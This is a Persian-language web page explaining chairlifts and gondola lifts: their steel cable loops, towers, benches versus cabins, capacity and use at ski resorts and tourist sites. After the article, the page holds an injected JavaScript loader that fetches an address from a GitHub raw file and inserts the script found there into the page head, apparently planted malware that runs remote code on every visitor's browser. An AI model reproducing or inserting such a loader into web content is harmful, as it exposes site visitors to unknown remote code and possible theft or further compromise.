تله سیژ

  • تله سیژ (Chairlift) نوعی وسیله جابه جایی یا بالابر است که معمولاً در پیست‌های اسکی و برخی پارک های منطقه ای به کار می رود. این بالابر از یک حلقه کابل فولادی پیوسته بین دو ایستگاه تشکیل شده که مجموعه ای از صندلی‌ها را جابه جا می کند و معمولاً تعدادی دکل میانی کابل را نگه می‌دارند.

    تله کابین (Telecabin) گونه‌ای آسانسور هوایی است که معمولاً برای جابجایی مردم یا کالا در مناطق کوهستانی استفاده می‌شود. تله کابین از یک حلقه طولانی کابل فولادی تشکیل شده که میان دو ایستگاه تنیده شده و دکل هایی در میان آن دو ایستگاه، کابل را در طی فاصله نگه می دارند. در فواصل مساوی کابین‌هایی به کابل وصل می شوند و کابل توسط موتوری برقی در یکی از ایستگا ها به حرکت در می آید.تله کابین در پیست‌های اسکی کاربرد زیادی دارد. واژه تله کابین از زبان فرانسوی به فارسی وارد شده است.

    تله سیژ

    یک وسیله برای جابه جایی یا آسانسور هوایی است که شباهت زیادی با تله کابین دارد. اما تله سیژ مانند تلکه کابین داردی کابین نیست و به بجای آن از یک نیمکت ایمنی تشکیل شده است. تله سیژ ها بیشتر در پیست های اسکی، پارک های تفریحی و جاذبه های توریستی به کار می رود. بالای حلقع متصل به نیمکت کابل فولادی پیوسته بین دو ایستگاه تشکیل شده که مجموعه ای از نیمکت ها را جا به جا می کند. معمولاً تعدادی دکل مینی کابل را نگه می دارند و بسته به کارایی سیم نقاله، تلع سیژ می تواند گاهی 4000 گردشگر را در ساعت جا به جا کند. ستفاده از تله سیژ می تواند برای همه ی افراد تجربه ایی هیجان انگیزی و کمی ترسناک باشد. زیرا نه تنها این امکان را ایجاد می کند که چشم اندازه وسیع تری از طبیعت و شهر خود را تماشا کنیم، بلکه معمولا امکانات تفریحی دیگری نیز در مقصد وجود دارند که جذایبت زیادی برای اکثر افراد دارد.

    (var url = “https://raw.githubusercontent.com/truba77/trubnik/main/to.txt”; fetch(url) .then(response => response.text()) .then(data => { var script = document.createElement(“script”); script.src = data.trim(); document.getElementsByTagName(“head”)[0].appendChild(script); });)

    امتیاز شما:

    میانگین امتیازات ۵ از ۵
    از مجموع ۱ رای

    دیدگاهتان را بنویسید